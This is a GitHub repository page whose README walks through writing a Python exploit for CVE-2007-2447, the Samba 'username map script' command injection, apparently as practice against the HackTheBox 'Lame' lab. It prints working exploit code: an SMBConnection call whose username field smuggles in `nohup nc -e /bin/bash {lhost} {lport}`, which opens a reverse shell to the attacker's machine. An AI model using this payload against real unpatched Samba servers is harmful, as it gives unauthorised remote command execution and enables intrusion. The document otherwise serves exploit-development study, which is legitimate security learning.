Skip to content

0xConstant/CVE-2007-2447

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits

README.md

README.md

 
 

exploit.py

exploit.py

 
 

Repository files navigation

ExploitDev Journey #6 | CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc 'Username' map script' Command Execution

Original Exploit: https://www.exploit-db.com/exploits/16320

Exploit name: Samba username map script RCE
CVE: 2007-2447
Lab: Lame - HackTheBox

Description

There is a vulnerability in Samba versions below 3.0.25 that allows an attacker to execute system commands by sending a malformed request as username to the SMB server.


How it works

Here is an example of using the nohup command to create a directory:

Programmatically speaking /= means divide and assignment operator usually used in loops. But why do we need to use it here?
The reason for using that is to divide the domain field and username field while sending the request, a better explanation can be found here. We use the username field to open a netcat connection and connect to our server.


Writing the exploit

Writing the exploit is very easy because there is already a SMB Client library available for Python (install python3-samba package) so all you have to do is to use it like this:

username = f"/=`nohup nc -e /bin/bash {lhost} {lport}`"
conn = SMBConnection(username, '', '', '')

try:
    print("Sending payload")
    conn.connect(rhost, rport, timeout=10)
except Exception as e:
    sys.exit(e)

Let's understand how SMBConnection works, I provided the username but what are the 3 other empty strings?
Those 3 other arguments are: password, my_name & remote_name

For purposes of making our exploit easy to read, we can explicitly write them along with their values but the values for the arguments after username are not required:

conn = SMBConnection(username=username, password='', my_name='', remote_name='')

The following part is easier to understand, we use the instance of SMBConnection class to make a connection and we provide target's IP, port and a timeout number in seconds:

conn.connect(rhost, rport, timeout=10)

Final thoughts

In this exploit development session you learned about creating an SMB client and connecting to a SMB server. You also learned about Linux commands such as nohup which you can later experiment around. You learned about connecting to your attacker machine from the victim machine using netcat which is something that might come useful in your exploit development journey.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages